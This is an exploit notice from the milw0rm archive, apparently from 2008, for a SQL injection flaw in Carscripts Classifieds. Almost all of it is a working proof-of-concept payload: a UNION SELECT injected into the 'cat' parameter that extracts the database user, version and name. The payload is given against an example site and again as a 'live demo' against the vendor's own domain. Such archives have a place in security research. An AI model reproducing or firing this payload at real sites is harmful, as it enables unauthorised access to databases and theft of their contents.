14 lines
511 B
Text
Executable file
14 lines
511 B
Text
Executable file
Carscripts Classifieds Sql INjection
|
|
|
|
By Stack
|
|
Home v4-team.com
|
|
###########################################
|
|
[+] : you can see the Result in 'Title'
|
|
[+] : Open the source page to see the result
|
|
###########################################
|
|
poc : http://site.co.il/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*
|
|
|
|
live demo
|
|
http://www.carscripts.com/cars/index.php?cat=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database()),2,3/*
|
|
|
|
# milw0rm.com [2008-06-18]
|